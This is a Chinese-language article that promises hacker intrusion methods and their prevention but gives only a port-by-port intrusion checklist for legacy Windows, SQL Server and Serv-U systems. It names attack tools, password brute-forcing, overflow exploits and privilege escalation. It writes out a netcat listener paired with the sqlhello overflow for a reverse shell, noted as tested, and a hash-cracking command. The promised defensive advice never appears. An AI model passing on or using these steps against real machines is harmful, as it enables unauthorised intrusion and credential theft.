常見的黑客入侵方法與防範

　　本文簡單介紹目前黑客最常使用的一些入侵工具及防禦的方法，希望能對大家有所幫助，以助於大家能更好地防禦黑客的攻擊，下面小編來告訴你吧!

　　1. 利用4899埠入侵

　　4899埠是一個遠端控制軟體***remote administrator***服務端監聽的埠，他不能算是一個木馬程式，但是具有遠端控制功能，通常防毒軟體是無法查出它來的

　　用4899過濾器.exe，掃描空口令的機器

　　2. 利用3899的入侵

　　對很早的機器，可以試試3389的溢位

　　對2000的機器，可以試試字典暴破。

　　3.利用1433埠入侵

　　1433埠，是SQL Server預設的埠，SQL Server服務使用兩個埠：TCP-1433、UDP-1434。其中1433用於供SQL Server對外提供服務，1434用於向請求者返回SQL Server使用了哪個TCP/IP埠。

　　scanport.exe 查有1433的機器

　　SQLScanPass.exe 進行字典暴破***字典是關鍵***

　　最後 SQLTools.exe入侵

　　對sql的sp2及以下的系統，可用sql的hello 溢位漏洞入侵。

　　nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠

　　***以上反向的，測試成功***

　　sqlhelloz.exe 入侵ip 1433 ***這個是正向連線***

　　4. 利用80埠入侵

　　80埠是為HTTP***HyperText Transport Protocol***即超文字傳輸協議開放的，此為上網衝浪使用次數最多的協議，主要用於WWW***World Wide Web***即全球資訊網傳輸資訊的協議。可以通過HTTP地址***即常說的“網址”***加“:80”來訪問網站，因為瀏覽網頁服務預設的埠號都是80，因此只需輸入網址即可，不用輸入“:80”了。

　　對sp3以前的機器，可以用webdav入侵;

　　對bbs論壇，可以試試上傳漏洞***upfile.exe或dvup_delphi.exe***

　　可以利用SQL進行注入。***小榕的注入軟體***。

　　5. 利用serv-u入侵***21埠***

　　21埠主要用於FTP***File Transfer Protocol，檔案傳輸協議***服務，FTP服務主要是為了在兩臺計算機之間實現檔案的上傳與下載，一臺計算機作為FTP客戶端，另一臺計算機作為FTP伺服器，可以採用匿名***anonymous***登入和授權使用者名稱與密碼登入兩種方式登入FTP伺服器。

　　對5. 004及以下系統，可用溢位入侵。***serv5004.exe***

　　對5.1.0.0及以下系統，可用本地提升許可權。***servlocal.exe***

　　對serv-u的MD5加密密碼，可以用字典暴破。***crack.vbs***

　　輸入一個被serv-u加密的密碼***34位長***，通過與字典檔***dict.txt***的比較，得到密碼。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

　　6. 利用554埠

　　用real554.exe入侵。

　　7. 利用6129埠

　　用DameWare6129.exe入侵。

　　8. 利用系統漏洞

　　利用135、445埠，用ms03026、ms03039、ms03049、ms04011漏洞，

　　進行溢位入侵。

　　9. 利用3127等埠

　　可以利用doom病毒開的埠，用nodoom.exe入侵。***可用mydoomscan.exe查***。

　　10. 利用其他入侵

　　利用shanlu的入侵軟體入侵***WINNTAutoAttack.exe***。